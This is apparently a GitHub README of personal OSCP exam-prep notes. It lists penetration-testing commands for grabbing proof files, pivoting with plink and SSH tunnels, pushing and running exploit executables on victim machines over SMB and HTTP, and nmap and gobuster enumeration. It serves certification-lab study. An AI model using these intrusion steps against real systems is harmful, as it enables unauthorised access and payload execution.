Skip to content
/ OSCP-PwK Public

my taken notes while learning for OSCP by OffensiveSecurity

0 stars 1 fork Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

RootInj3c/OSCP-PwK

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

57 Commits
BufferOverflow
BufferOverflow
 
 
Linux
Linux
 
 
Services
Services
 
 
Windows
Windows
 
 
README.md
README.md
 
 

Repository files navigation

OSCP Prep Notes

Welcome to my learning notes for OSCP by OffensiveSecurity. I will update the metrials here during my 30 days course time.

Taking Proof files

Windows

hostname && whoami && type C:\Documents and Settings\Administrator\Desktop\proof.txt && ipconfig /all

Linux

hostname && whoami && cat /root/proof.txt && /sbin/ifconfig

Pivoting

Windows

Find running service which are listening to loopback only (i.e., 127.0.0.1 or LISTENING/LISTEN in thier status):

netstat -ano

For example, if MySQL found listen locally on 3306 we can use plink.exe to prefrom port forward to our machine:

C:\Windows\Temp> plink.exe -l root -pw toor 192.168.0.101 -R 3306:127.0.0.1:3306

Then in kali you could interact with database locally:

root@kali:~/#: mysql -u root -p

The plink.exe could be found here: https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html

Linux

Use Local port forwarding technqiue with ssh command to as following:

alice@vcitimmachine:~/#: ssh -L 3306:127.0.0.1:3306 root@192.168.0.101

There are many techniques such as Remote port forwarding, Dynamic port forwarding and SSHuttle tool which might be useful for some cases :)

Transferring files

Rdesktop

If if had a remote dektop machine I used the following command to mount share folder:

root@kali:~/#: rdesktop 192.268.11.10 -r disk:share=/home/bayo/store

SMB Share

In kali use Impacket to create local SMB Share:

root@kali:~/#: python /usr/share/impacket/examples/smbserver.py MyShare /

On victim machine execute my payload via SMB:

C:\> \\192.168.11.10\MyShare\exploit_kernerl.exe

Python Server

On my kali machine, start the Python SimpleHTTPServer on port 80:

root@kali:~/#: python -m SimpleHTTPServer 8080

Then use powershell on victim machine / wget in linux to download my exploit.

Methodology

  1. Ports & Services Enumeration using NMAP
root@kali:~/#: nmap -sV -sC -p- <IP>
root@kali:~/#: nmap -sU --top-ports=50 <IP>
root@kali:~/#: nmap --script smb-vuln-* <IP>
root@kali:~/#: nmap -sV -T4 -p- <IP> (Quick method)
  1. Enumerate web application
root@kali:~/#: gobuster dir -u <url> -w /usr/share/wordlist/directory-2.3-meduim.txt
root@kali:~/#: nikito -u <url>
  1. Post Exploition

After gaining inital acsses to shell and prompt TTY shell, then running one of the following script to enumrate:

Windows:

Linux:

If none of them works, move to manully search.

  1. Priviliage esclation

Depend on the attack vector preform priviliage esclation.

About

my taken notes while learning for OSCP by OffensiveSecurity

Resources

Readme
Activity

Stars

0 stars

Watchers

1 watching

Forks

1 fork
Report repository

Releases

No releases published

Packages

No packages published